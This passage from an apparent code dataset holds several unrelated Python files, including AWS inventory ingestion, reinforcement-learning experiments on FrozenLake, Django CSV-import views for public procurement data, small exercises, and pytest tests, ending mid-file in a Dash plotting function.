= str(group['CreatedTime'])\n\n neo4j_session.run(\n ingest_group,\n autoscaling_groups_list=data,\n AWS_ACCOUNT_ID=current_aws_account_id,\n Region=region,\n update_tag=update_tag,\n )\n neo4j_session.run(\n ingest_lcs,\n autoscaling_groups_list=launch_configs,\n AWS_ACCOUNT_ID=current_aws_account_id,\n Region=region,\n update_tag=update_tag,\n )\n neo4j_session.run(\n 
ingest_lts,\n autoscaling_groups_list=launch_templates,\n AWS_ACCOUNT_ID=current_aws_account_id,\n Region=region,\n update_tag=update_tag,\n )\n\n for group in data:\n group_arn = group[\"AutoScalingGroupARN\"]\n if group.get('VPCZoneIdentifier'):\n vpclist = group[\"VPCZoneIdentifier\"]\n if ',' in vpclist:\n data = vpclist.split(',')\n else:\n data = vpclist\n neo4j_session.run(\n ingest_vpc,\n vpc_id_list=data,\n GROUPARN=group_arn,\n update_tag=update_tag,\n )\n\n if group.get(\"Instances\"):\n data = group[\"Instances\"]\n neo4j_session.run(\n ingest_instance,\n instances_list=data,\n GROUPARN=group_arn,\n AWS_ACCOUNT_ID=current_aws_account_id,\n Region=region,\n update_tag=update_tag,\n )\n\n\n@timeit\ndef cleanup_ec2_auto_scaling_groups(neo4j_session: neo4j.Session, common_job_parameters: Dict) -> None:\n run_cleanup_job(\n 'aws_ingest_ec2_auto_scaling_groups_cleanup.json',\n neo4j_session,\n common_job_parameters,\n )\n\n\n@timeit\ndef cleanup_ec2_launch_configurations(neo4j_session: neo4j.Session, common_job_parameters: Dict) -> None:\n run_cleanup_job(\n 'aws_import_ec2_launch_configurations_cleanup.json',\n neo4j_session,\n common_job_parameters,\n )\n\n\n@timeit\ndef sync_ec2_auto_scaling_groups(\n neo4j_session: neo4j.Session, boto3_session: boto3.session.Session, regions: List[str],\n current_aws_account_id: str, update_tag: int, common_job_parameters: Dict,\n) -> None:\n for region in regions:\n logger.debug(\"Syncing auto scaling groups for region '%s' in account '%s'.\", region, current_aws_account_id)\n lc_data = get_launch_configurations(boto3_session, region)\n load_launch_configurations(neo4j_session, lc_data, region, current_aws_account_id, update_tag)\n data = get_ec2_auto_scaling_groups(boto3_session, region)\n load_ec2_auto_scaling_groups(neo4j_session, data, region, current_aws_account_id, update_tag)\n cleanup_ec2_auto_scaling_groups(neo4j_session, common_job_parameters)\n cleanup_ec2_launch_configurations(neo4j_session, common_job_parameters)\n","repo_name":"lyft/cartography","sub_path":"cartography/intel/aws/ec2/auto_scaling_groups.py","file_name":"auto_scaling_groups.py","file_ext":"py","file_size_in_byte":9223,"program_lang":"python","lang":"en","doc_type":"code","stars":2765,"dataset":"github-code","pt":"52"} +{"seq_id":"42580100057","text":"import gym\nimport math\nimport random\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom collections import namedtuple\nfrom itertools import count\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nTransition = namedtuple('Transition', ('state', 'action', 'next_state', 'reward'))\n\nepsilon = 0.4\nGAMMA = 0.9\nBATCH_SIZE = 128\nepisode_num = 10000\ncapacity = 1000\nTARGET_UPDATE = 50\nenv = gym.make('FrozenLake-v0')\naction_num = env.action_space.n\nstate_num = env.observation_space.n\n\n\nclass ReplayMemory(object):\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.memory = []\n self.position = 0\n\n def push(self, *args):\n if len(self.memory) < self.capacity:\n self.memory.append(None)\n self.memory[self.position] = Transition(*args)\n self.position = (self.position + 1) % self.capacity\n\n def sample(self, batch_size):\n return random.sample(self.memory, batch_size)\n\n def __len__(self):\n return len(self.memory)\n\n\ndef one_hot_vec(dimension, index):\n v = torch.zeros(dimension)\n v[index] = 1\n return v\n\n\nclass DQN(nn.Module):\n\n def __init__(self, state_num, action_num):\n super(DQN, self).__init__()\n 
self.linear1 = nn.Linear(state_num, 8)\n self.linear2 = nn.Linear(8, action_num)\n\n def forward(self, x):\n x = F.relu(self.linear1(x))\n return self.linear2(x)\n\ndef QLearning():\n qtable = np.random.rand(state_num, action_num)\n def SelectAction(state):\n p = random.random()\n if p > epsilon:\n return np.argmax(qtable[state])\n else:\n return env.action_space.sample()\n\n def Evaluate(r):\n succ_num = 0\n for i in range(1000):\n state = env.reset()\n done = False\n while not done:\n if r:\n action = env.action_space.sample()\n else:\n action = np.argmax(qtable[state])\n next_state, reward, done, _ = env.step(action)\n state = next_state\n if state == 15:\n succ_num += 1\n print('success rate:', 100.0 * succ_num / 1000)\n for e in range(episode_num):\n if e % 1000 == 0:\n print(e)\n state = env.reset()\n done = False\n while not done:\n action = SelectAction(state)\n next_state, reward, done, _ = env.step(action)\n \n if done:\n qtable[state,action] += 0.1 * (reward - qtable[state,action])\n else:\n qtable[state,action] += 0.1 * (reward + GAMMA * np.max(qtable[next_state]) - qtable[state, action])\n \n state = next_state\n print(qtable)\n Evaluate(True)\n \n\ndef DeepQLearning():\n\n capacity = 1000\n\n model = DQN(state_num, action_num)\n ref = DQN(state_num, action_num)\n ref.load_state_dict(model.state_dict())\n ref.eval()\n\n #optimizer = optim.RMSprop(model.state_dict())\n optimizer = optim.Adam(model.parameters(), lr = 0.01)\n def SelectAction(state):\n global epsilon\n p = random.random()\n if p < epsilon:\n # return one_hot_vec(env.action_space.sample())\n return env.action_space.sample()\n else:\n # return one_hot_vec(model(state).max(1)[1].item())\n state_vec = one_hot_vec(state_num, state)\n return model(state_vec).argmax().item()\n\n memory = ReplayMemory(capacity)\n loss = nn.MSELoss()\n def Optimize():\n if len(memory) < BATCH_SIZE:\n return\n transitions = memory.sample(BATCH_SIZE)\n batch = Transition(*zip(*transitions))\n #print('batch.state', batch.state)\n state_batch = torch.stack(batch.state)\n action_batch = torch.tensor(batch.action, dtype=torch.int64)\n reward_batch = torch.stack(batch.reward)\n mask = []\n non_final_next_state = []\n for s in batch.next_state:\n if s is not None:\n mask.append(1)\n non_final_next_state.append(s)\n else:\n mask.append(0)\n next_state_mask = torch.tensor(mask, dtype=torch.int64)\n next_state_batch = torch.stack(non_final_next_state)\n\n #print('state_batch', state_batch.size())\n y = model(state_batch)\n #print('y', y.size())\n #print('action_batch', action_batch.size())\n state_action_values = torch.gather(y, 1, action_batch)\n #state_action_values = model(state_batch).gather(1, action_batch)\n\n next_state_values = torch.zeros(BATCH_SIZE, 1)\n y = ref(next_state_batch)\n #print('y', y.size())\n #print('next_state_values', next_state_values.size())\n next_state_values[next_state_mask] = ref(next_state_batch).max(1, keepdim=True)[0].detach()\n #next_state_value = ref(state_batch).max(1)[0].detach()\n #print('next_state_value', next_state_value.size())\n expected_state_action_values = reward_batch + (next_state_values * GAMMA)\n\n #loss = F.MSELoss(state_action_values, expected_state_action_values)\n #print(next_state_values.size(), reward_batch.size())\n #print(state_action_values.size(), expected_state_action_values.size())\n output = loss(state_action_values, expected_state_action_values)\n optimizer.zero_grad()\n output.backward()\n for param in model.parameters():\n param.grad.data.clamp_(-1, 1)\n optimizer.step()\n\n def 
Evaluate():\n success_num = 0\n for i in range(50):\n state = env.reset()\n done = False\n while not done:\n state_vec = one_hot_vec(state_num, state)\n action = model(state_vec).argmax().item()\n state, _, done, _ = env.step(action)\n if state == 15:\n success_num += 1\n print(\"Success ratio: \", 1.0 * success_num / 50 * 100, '%')\n\n for e in range(episode_num):\n state = env.reset()\n done = False\n #while not done:\n global epsilon\n for step in count():\n if step > 0 and step % 1000 == 0:\n epsilon -= 0.099\n action = SelectAction(state)\n next_state, reward, done, _ = env.step(action)\n\n state_vec = one_hot_vec(state_num, state)\n next_state_vec = one_hot_vec(state_num, next_state)\n reward_vec = torch.Tensor([reward])\n\n if done:\n next_state = None\n memory.push(state_vec, [action], next_state_vec, reward_vec)\n\n state = next_state\n\n Optimize()\n\n if done:\n break\n if e % TARGET_UPDATE == 0:\n ref.load_state_dict(model.state_dict())\n Evaluate()\n\n\n\nif __name__ == '__main__':\n #DeepQLearning()\n QLearning()\n","repo_name":"FengKaiyu/RTRee","sub_path":"cartpole.py","file_name":"cartpole.py","file_ext":"py","file_size_in_byte":6962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74724856163","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 7 16:44:37 2021\n\n@author: wwwlu\n\"\"\"\n\nprint('Vamos converter um valor em metros para centímetros e milímetros!')\nm = float(input('Digite um valor em metros: '))\nkm = m/1000\nhm = m/100\ndam = m/10\ndm = m*10\ncm = m*100\nmm = m*1000\n\nprint('Convertendo, temos que {:.2f}m é igual a {:.0f}mm, {:.0f}cm, {:.0f}dm, {}dam, {}hm e {}km.' .format(m, mm, cm, dm, dam, hm, km))","repo_name":"fluiz7/Python","sub_path":"Exercícios/Q 008.py","file_name":"Q 008.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26298294015","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('library', '0009_auto_20151017_1514'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Borrower',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('person_that_borrowed_it', models.CharField(max_length=100)),\n ('book_that_was_borrowed', models.CharField(max_length=100)),\n ('no_of_copies', models.IntegerField()),\n ],\n ),\n migrations.DeleteModel(\n name='Borrowed',\n ),\n ]\n","repo_name":"samirotiv/ToyDjangoREST","sub_path":"demo/library/migrations/0010_auto_20151017_1526.py","file_name":"0010_auto_20151017_1526.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73521737764","text":"from math import sqrt\nn = int(input(\">\"))\n\nx = list(range(2, n))\n\n# k = 2\n# new = []\n# while k <= sqrt(n):\n# i = 0\n# z = set()\n# if k in x:\n# new.append(k)\n# z = set(range(k, len(x) + 2, k))\n# x = list(set(x) - set(z))\n# k += 1\n# print(x)\n\n\nk = 2\nnew = []\nwhile k <= sqrt(n):\n if k in x:\n new.append(k)\n i = 0\n while i < len(x):\n if x[i] % k == 0:\n del x[i]\n\n else:\n i += 1\n k += 1\n\n\n\nprint(new + x)\n\n\n","repo_name":"Gygrus/WDI-ASD-course-Python","sub_path":"Semestr 
I/zestaw_3/cw3.py","file_name":"cw3.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74912172003","text":"from django.shortcuts import render\nfrom django.shortcuts import render,redirect\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.views import generic\nfrom django.urls import reverse, reverse_lazy\nimport csv\nimport io\nimport os\nfrom django.core.files.uploadedfile import InMemoryUploadedFile\nfrom django.http import HttpResponse\nfrom datetime import datetime\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate\nimport shutil\nfrom django.conf import settings\nfrom django.db.models import Q\nimport tempfile\n\nfrom analisiscompraspublicas.models import contract, sri_ente, award, release, planning, supplier, tender\n\n\ndef CargaInfoView(request):\n template_name = \"cargainfo/cargainfo.html\"\n context = {} \n\n if request.method == 'POST':\n csv_file = request.FILES['archivo_csv']\n # validar el nombre del archivo en los primeros 7 caracteres\n if csv_file.name[:10] == \"contracts_\":\n cargar_info_csv(csv_file, request.user, \"|\")\n\n if csv_file.name[:7] == \"awards_\":\n cargar_info_award(csv_file, request.user, \"|\")\n\n if csv_file.name[:9] == \"releases_\":\n cargar_info_release(csv_file, request.user, \"|\")\n\n if csv_file.name[:9] == \"planning_\":\n cargar_info_planning(csv_file, request.user, \"|\")\n\n if csv_file.name[:10] == \"suppliers_\":\n cargar_info_supplier(csv_file, request.user, \"|\")\n\n if csv_file.name[:7] == \"tender_\":\n cargar_info_tender(csv_file, request.user, \"|\")\n\n if csv_file.name[:7] == \"SRI_RUC\":\n cargar_info_sri(csv_file, request.user, \"|\")\n \n return render(request, template_name, context = { 'mensaje' : \"Archivo procesado\" })\n\n\ndef cargar_info_csv(csv_file, user, separador):\n if csv_file:\n with tempfile.NamedTemporaryFile(delete=False) as file:\n file.write(csv_file.read())\n file.close()\n\n with open(file=file.name, mode='r', encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n next(reader)\n for line in reader:\n #Lee información\n \n try:\n columns = ','.join(line).split(separador)\n ocid = columns[0] #.replace(\"'\",\"\")\n release_id = columns[1] #.replace(\"'\",\"\")\n co_id = columns[2] #.replace(\"'\",\"\")\n awardID = columns[3] #.replace(\"'\",\"\")\n title = columns[4] #.replace(\"'\",\"\")\n description = columns[5] #.replace(\"'\",\"\")\n status = columns[6] #.replace(\"'\",\"\")\n contractPeriod_startDate = columns[7][:10] # #.replace(\"'\",\"\")[:10]\n contractPeriod_endDate = columns[8] #.replace(\"'\",\"\")\n contractPeriod_maxExtentDate = columns[9] #.replace(\"'\",\"\")\n contractPeriod_durationInDays = columns[10] #.replace(\"'\",\"\")\n amount = columns[11] #.replace(\"'\",\"\")\n currency = columns[12] #.replace(\"'\",\"\")\n dateSigned = columns[13][:10] # #.replace(\"'\",\"\")[:10]\n\n # Guarda solicitud de compra\n ocontract = contract(\n ocid = ocid,\n release_id = release_id,\n co_id = co_id,\n awardID = awardID,\n title = title,\n description = description,\n status = status,\n contractPeriod_startDate = contractPeriod_startDate,\n contractPeriod_endDate = contractPeriod_endDate,\n contractPeriod_maxExtentDate = contractPeriod_maxExtentDate,\n contractPeriod_durationInDays = 
contractPeriod_durationInDays,\n amount = amount,\n currency = currency,\n dateSigned = dateSigned)\n ocontract.save()\n except Exception as e:\n columns = None\n finally:\n columns = None\n\n\ndef cargar_info_sri (csv_file, user, separador):\n if csv_file:\n with tempfile.NamedTemporaryFile(delete=False) as file:\n file.write(csv_file.read())\n file.close()\n\n with open(file=file.name, mode='r', encoding=\"ansi\") as f:\n reader = csv.reader(f)\n next(reader)\n for line in reader:\n #Lee información\n try:\n columns = line.split(separador)\n numero_ruc = columns[0]\n razon_social = columns[1]\n provincia_jurisdiccion = columns[2]\n nombre_comercial = columns[3]\n estado_contribuyente = columns[4]\n clase_contribuyente = columns[5]\n fecha_inicio_actividades = columns[6]\n fecha_actualizacion = columns[7]\n fecha_suspension_definitiva = columns[8]\n fecha_reinicio_actividades = columns[9]\n obligado = columns[10]\n tipo_contribuyente = columns[11]\n numero_establecimiento = columns[12]\n nombre_fantasia_comercial = columns[13]\n estado_establecimiento = columns[14]\n descripcion_provincia_est = columns[15]\n descripcion_canton_est = columns[16]\n descripcion_parroquia_est = columns[17]\n codigo_ciiu = columns[18]\n actividad_economica = columns[19]\n\n # Guarda solicitud de compra\n osri_ente = sri_ente(\n numero_ruc = numero_ruc,\n razon_social = razon_social,\n provincia_jurisdiccion = provincia_jurisdiccion,\n nombre_comercial = nombre_comercial,\n estado_contribuyente = estado_contribuyente,\n clase_contribuyente = clase_contribuyente,\n fecha_inicio_actividades = fecha_inicio_actividades,\n fecha_actualizacion = fecha_actualizacion,\n fecha_suspension_definitiva = fecha_suspension_definitiva,\n fecha_reinicio_actividades = fecha_reinicio_actividades,\n obligado = obligado,\n tipo_contribuyente = tipo_contribuyente,\n numero_establecimiento = numero_establecimiento,\n nombre_fantasia_comercial = nombre_fantasia_comercial,\n estado_establecimiento = estado_establecimiento,\n descripcion_provincia_est = descripcion_provincia_est,\n descripcion_canton_est = descripcion_canton_est,\n descripcion_parroquia_est = descripcion_parroquia_est,\n codigo_ciiu = codigo_ciiu,\n actividad_economica = actividad_economica\n )\n osri_ente.save()\n except Exception as e:\n columns = None\n finally:\n columns = None\n\n\ndef cargar_info_award(csv_file, user, separador):\n if csv_file:\n with tempfile.NamedTemporaryFile(delete=False) as file:\n file.write(csv_file.read())\n file.close()\n\n with open(file=file.name, mode='r', encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n next(reader)\n for line in reader:\n #Lee información\n try:\n columns = ','.join(line).split(separador)\n ocid = columns[0] #.replace(\"'\",\"\")\n release_id = columns[1] #.replace(\"'\",\"\")\n aw_id = columns[2] #.replace(\"'\",\"\")\n title = columns[3] #.replace(\"'\",\"\")\n description = columns[4] #.replace(\"'\",\"\")\n status = columns[5] #.replace(\"'\",\"\")\n date = columns[6] #.replace(\"'\",\"\")\n amount = columns[7] #.replace(\"'\",\"\")\n currency = columns[8] #.replace(\"'\",\"\")\n correctedValue_amount = columns[9] #.replace(\"'\",\"\")\n correctedValue_currency = columns[10] #.replace(\"'\",\"\")\n enteredValue_amount = columns[11] #.replace(\"'\",\"\")\n enteredValue_currency = columns[12] #.replace(\"'\",\"\")\n contractPeriod_startDate = columns[13][:10] # #.replace(\"'\",\"\")[:10]\n contractPeriod_endDate = columns[14][:10] # #.replace(\"'\",\"\")[:10]\n contractPeriod_maxExtentDate = columns[15][:10] # 
#.replace(\"'\",\"\")[:10]\n contractPeriod_durationInDays = columns[16] #.replace(\"'\",\"\")\n\n # Guarda solicitud de compra\n oaward = award(\n ocid = ocid,\n release_id = release_id,\n aw_id = aw_id,\n title = title,\n description = description,\n status = status,\n date = date,\n amount = amount,\n currency = currency,\n correctedValue_amount = correctedValue_amount,\n correctedValue_currency = correctedValue_currency,\n enteredValue_amount = enteredValue_amount,\n enteredValue_currency = enteredValue_currency,\n contractPeriod_startDate = contractPeriod_startDate,\n contractPeriod_endDate = contractPeriod_endDate,\n contractPeriod_maxExtentDate = contractPeriod_maxExtentDate,\n contractPeriod_durationInDays = contractPeriod_durationInDays\n )\n oaward.save()\n except Exception as e:\n columns = None\n finally:\n columns = None\n\n\ndef cargar_info_release(csv_file, user, separador):\n if csv_file:\n with tempfile.NamedTemporaryFile(delete=False) as file:\n file.write(csv_file.read())\n file.close()\n\n with open(file=file.name, mode='r', encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n next(reader)\n for line in reader:\n #Lee información\n try:\n columns = ','.join(line).split(separador)\n ocid = columns[0] #.replace(\"'\",\"\")\n re_id = columns[1] #.replace(\"'\",\"\")\n initiationType = columns[2] #.replace(\"'\",\"\")\n buyer_id = columns[3] #.replace(\"'\",\"\")\n buyer_name = columns[4] #.replace(\"'\",\"\")\n language = columns[5] #.replace(\"'\",\"\")\n date = columns[6] #.replace(\"'\",\"\")\n tag = columns[7] #.replace(\"'\",\"\")\n\n # Guarda solicitud de compra\n orelease = release(\n ocid = ocid,\n re_id = re_id,\n initiationType = initiationType,\n buyer_id = buyer_id,\n buyer_name = buyer_name,\n language = language,\n date = date,\n tag = tag\n )\n orelease.save()\n except Exception as e:\n columns = None\n finally:\n columns = None\n\ndef cargar_info_planning(csv_file, user, separador):\n if csv_file:\n with tempfile.NamedTemporaryFile(delete=False) as file:\n file.write(csv_file.read())\n file.close()\n\n with open(file=file.name, mode='r', encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n next(reader)\n for line in reader:\n #Lee información\n try:\n columns = ','.join(line).split(separador)\n ocid = columns[0] #.replace(\"'\",\"\")\n pa_id = columns[1] #.replace(\"'\",\"\")\n rationale = columns[2] #.replace(\"'\",\"\")\n budget_id = columns[3] #.replace(\"'\",\"\")\n budget_description = columns[4] #.replace(\"'\",\"\")\n budget_amount = columns[5] #.replace(\"'\",\"\")\n budget_currency = columns[6] #.replace(\"'\",\"\")\n\n\n # Guarda solicitud de compra\n oplanning = planning(\n ocid = ocid,\n pa_id = pa_id,\n rationale = rationale,\n budget_id = budget_id,\n budget_description = budget_description,\n budget_amount = budget_amount,\n budget_currency = budget_currency\n )\n \n oplanning.save()\n except Exception as e:\n columns = None\n finally:\n columns = None\n\ndef cargar_info_supplier(csv_file, user, separador):\n if csv_file:\n with tempfile.NamedTemporaryFile(delete=False) as file:\n file.write(csv_file.read())\n file.close()\n\n with open(file=file.name, mode='r', encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n next(reader)\n for line in reader:\n #Lee información\n try:\n columns = ','.join(line).split(separador)\n ocid = columns[0] #.replace(\"'\",\"\")\n release_id = columns[1] #.replace(\"'\",\"\")\n award_id = columns[2] #.replace(\"'\",\"\")\n su_id = columns[3] #.replace(\"'\",\"\")\n name = columns[4] #.replace(\"'\",\"\")\n\n # 
Guarda solicitud de compra\n osupplier = supplier(\n ocid = ocid,\n release_id = release_id,\n award_id = award_id,\n su_id = su_id,\n name = name\n )\n \n osupplier.save()\n except Exception as e:\n columns = None\n finally:\n columns = None\n\ndef cargar_info_tender(csv_file, user, separador):\n if csv_file:\n with tempfile.NamedTemporaryFile(delete=False) as file:\n file.write(csv_file.read())\n file.close()\n\n with open(file=file.name, mode='r', encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n next(reader)\n for line in reader:\n #Lee información\n try:\n columns = ','.join(line).split(separador)\n ocid = columns[0] #.replace(\"'\",\"\")\n release_id = columns[1] #.replace(\"'\",\"\")\n te_id = columns[2] #.replace(\"'\",\"\")\n title = columns[3] #.replace(\"'\",\"\")\n description = columns[4] #.replace(\"'\",\"\")\n status = columns[5] #.replace(\"'\",\"\")\n procuringEntity_id = columns[6] #.replace(\"'\",\"\")\n procuringEntity_name = columns[7] #.replace(\"'\",\"\")\n value_amount = columns[8] #.replace(\"'\",\"\")\n value_currency = columns[9] #.replace(\"'\",\"\")\n procurementMethod = columns[10] #.replace(\"'\",\"\")\n procurementMethodDetails = columns[11] #.replace(\"'\",\"\")\n mainProcurementCategory = columns[12] #.replace(\"'\",\"\")\n awardCriteria = columns[13] #.replace(\"'\",\"\")\n tenderPeriod_startDate = columns[14][:10] # #.replace(\"'\",\"\")[:10]\n tenderPeriod_endDate = columns[15][:10] # #.replace(\"'\",\"\")[:10]\n tenderPeriod_maxExtentDate = columns[16] #.replace(\"'\",\"\")\n tenderPeriod_durationInDays = columns[17] #.replace(\"'\",\"\")\n enquiryPeriod_startDate = columns[18][:10] # #.replace(\"'\",\"\")[:10]\n enquiryPeriod_endDate = columns[19][:10] # #.replace(\"'\",\"\")[:10]\n enquiryPeriod_maxExtentDate = columns[20][:10] # #.replace(\"'\",\"\")[:10]\n enquiryPeriod_durationInDays = columns[21] #.replace(\"'\",\"\")\n hasEnquiries = columns[22] #.replace(\"'\",\"\")\n eligibilityCriteria = columns[23] #.replace(\"'\",\"\")\n awardPeriod_startDate = columns[24][:10] # #.replace(\"'\",\"\")[:10]\n awardPeriod_endDate = columns[25][:10] # #.replace(\"'\",\"\")[:10]\n awardPeriod_maxExtentDate = columns[26][:10] # #.replace(\"'\",\"\")[:10]\n awardPeriod_durationInDays = columns[27] #.replace(\"'\",\"\")\n numberOfTenderers = columns[28] #.replace(\"'\",\"\")\n\n # Guarda solicitud de compra\n otender = tender(\n ocid = ocid,\n release_id = release_id,\n te_id = te_id,\n title = title,\n description = description,\n status = status,\n procuringEntity_id = procuringEntity_id,\n procuringEntity_name = procuringEntity_name,\n value_amount = value_amount,\n value_currency = value_currency,\n procurementMethod = procurementMethod,\n procurementMethodDetails = procurementMethodDetails,\n mainProcurementCategory = mainProcurementCategory,\n awardCriteria = awardCriteria,\n tenderPeriod_startDate = tenderPeriod_startDate,\n tenderPeriod_endDate = tenderPeriod_endDate,\n tenderPeriod_maxExtentDate = tenderPeriod_maxExtentDate,\n tenderPeriod_durationInDays = tenderPeriod_durationInDays,\n enquiryPeriod_startDate = enquiryPeriod_startDate,\n enquiryPeriod_endDate = enquiryPeriod_endDate,\n enquiryPeriod_maxExtentDate = enquiryPeriod_maxExtentDate,\n enquiryPeriod_durationInDays = enquiryPeriod_durationInDays,\n hasEnquiries = hasEnquiries,\n eligibilityCriteria = eligibilityCriteria,\n awardPeriod_startDate = awardPeriod_startDate,\n awardPeriod_endDate = awardPeriod_endDate,\n awardPeriod_maxExtentDate = awardPeriod_maxExtentDate,\n 
awardPeriod_durationInDays = awardPeriod_durationInDays,\n numberOfTenderers = numberOfTenderers\n )\n otender.save()\n except Exception as e:\n columns = None\n finally:\n columns = None","repo_name":"Shadycore/iacompraspublicas","sub_path":"cargainfo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11184986230","text":"# THIS FILE IS DEPRECATED!!!\n# Make changes to WordSeries.py!!!\n\nimport sys\n\ndef get_symbols():\n\t'''instantiate dictionarty of symbol_series'''\n\tfilename = \"symbol_series.txt\"\n\tsymbol_dict = {}\n\twith open(filename, 'r') as f:\n\t\tfor line in f.readlines():\n\t\t\tdata = line.strip().split(' ')\n\t\t\tfor item in data:\n\t\t\t\tsymbol_dict[item] = data[0]\n\treturn symbol_dict\n\ndef get_word_series(word, symbol_dict):\n\t'''determines the series of each sound in word'''\n\tword_series = []\n\tcurrent_state = ''\n\tfor letter in word:\n\t\tif current_state == '':\n\t\t\tcurrent_state = letter\n\t\t\tcontinue\n\t\tif current_state + letter in \\\n\t\t\t[key[:len(current_state+letter)] for key in symbol_dict.keys()]:\n\t\t\tcurrent_state += letter\n\t\telse:\n\t\t\tword_series.append(symbol_dict[current_state])\n\t\t\tcurrent_state = letter\n\tword_series.append(symbol_dict[current_state])\n\treturn word_series\n\ndef test_set():\n\ttest_words = ['mani', 'waḵi', \"'amnōkun\", \"'anūnkīn\", \"k`amits\", \"pṓtr'mō\", \"'ama'\", \"uʃ\", \"p`ak̄'āthinhin\"]\n\tsymbol_dict = get_symbols()\n\tprint(symbol_dict)\n\tfor word in test_words:\n\t\tprint(word, ':', get_word_series(word, symbol_dict))\n\nif __name__ == '__main__':\n\ttest_set()\n","repo_name":"nathanmwhite/yowlumne_wield","sub_path":"matching/get_series.py","file_name":"get_series.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39986576910","text":"import pytest\nimport logging\nfrom app.main import parse_cli, load_config, convert_from_human_readable, setup_log\n\n\n@pytest.mark.parametrize(\n \"in_value,out_value\",\n [\n (1000, 1000),\n (\"1000\", 1000),\n (\"10k\", 10240),\n (\"10M\", 10485760),\n (\"10G\", 10737418240),\n ],\n)\ndef test_convert_from_human_readable(in_value, out_value) -> None:\n \"\"\"Test the conversion of ex. 
10k to 10240.\"\"\"\n assert convert_from_human_readable(in_value) == out_value\n\n\ndef test_convert_from_human_readable_fail() -> None:\n \"\"\"Test when the conversion fails.\"\"\"\n with pytest.raises(ValueError):\n assert convert_from_human_readable(\"10m\")\n\n\ndef test_parse_cli() -> None:\n \"\"\"Test the parsing of the CLI options.\"\"\"\n options = parse_cli(cli_args=[\"-c\", \"tests/testdata/sample_config.ini\"])\n\n assert options.configfile == \"tests/testdata/sample_config.ini\"\n\n\ndef test_load_config() -> None:\n \"\"\"Test the load of the config file.\"\"\"\n with pytest.raises(FileNotFoundError):\n load_config(configfile=\"tests/testdata/file_does_nor_exist.ini\")\n\n config = load_config(configfile=\"tests/testdata/config_ok.ini\")\n\n assert config.items(\"logging\") == [\n (\"loglevel\", \"debug\"),\n (\"logfile\", \"/path/to/logfile.log\"),\n (\"keep\", \"10\"),\n (\"size\", \"10M\"),\n (\"log_to_stdout\", \"no\"),\n ]\n\n assert config.items(\"serial\") == [\n (\"port\", \"/dev/serial0\"),\n (\"speed\", \"115000\"),\n (\"bytes\", \"8\"),\n (\"parity\", \"N\"),\n (\"stopbits\", \"1\"),\n ]\n\n assert config.items(\"influx\") == [\n (\"hostname\", \"127.0.0.1\"),\n (\"port\", \"8086\"),\n (\"database\", \"smartmeter\"),\n ]\n\n\ndef test_setup_logging():\n \"\"\"Test if we can setup the logging.\"\"\"\n logger = setup_log(filename=\"testlog.log\", size=\"1M\", keep=2, log_to_stdout=True)\n\n assert isinstance(logger.handlers[0], logging.handlers.RotatingFileHandler)\n assert isinstance(logger.handlers[1], logging.StreamHandler)\n","repo_name":"WimDH/smartmeter-python","sub_path":"tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"6918926168","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objs as go\nfrom datetime import datetime,timedelta\n\nimport pandas as pd\n\nfrom django.apps import apps\n\nfrom django_plotly_dash import DjangoDash\n\n\n\ndef fraud_inspector_FraudOrders(city ,start_date,end_date):\n FraudOrders=apps.get_model('fraud_inspector','FraudOrders')\n head=[]\n for e in FraudOrders._meta.get_fields():\n head.append((str(e)).replace(\"fraud_inspector.FraudOrders.\", ''))\n if '0' in city or 0 in city:\n FraudOrder=FraudOrders.objects.filter(order_date__range=(start_date,end_date))\n FraudOrder=FraudOrder.values_list()\n else:\n FraudOrder=FraudOrders.objects.filter(launch_region_id__in=city,order_date__range=(start_date,end_date))\n FraudOrder=FraudOrder.values_list() \n FraudOrder=pd.DataFrame(FraudOrder,columns=head)\n FraudOrder['order_date']=pd.to_datetime(FraudOrder['order_date'], errors='coerce')\n FraudOrder['order_date']=FraudOrder['order_date'].dt.date\n FraudOrder=FraudOrder[['order_date','resolution']]\n FraudOrder=FraudOrder.groupby(['order_date','resolution']).size().reset_index(name='resolution_count')\n FraudOrder=FraudOrder.sort_values(['order_date'], ascending = [1])\n FRAUD_NO=FraudOrder.loc[(FraudOrder['resolution'] == 'FRAUD NO')]\n FRAUD_YES=FraudOrder.loc[(FraudOrder['resolution'] == 'FRAUD YES')]\n x_n=FRAUD_NO['order_date'].values.tolist()\n y_n=FRAUD_NO['resolution_count'].values.tolist()\n 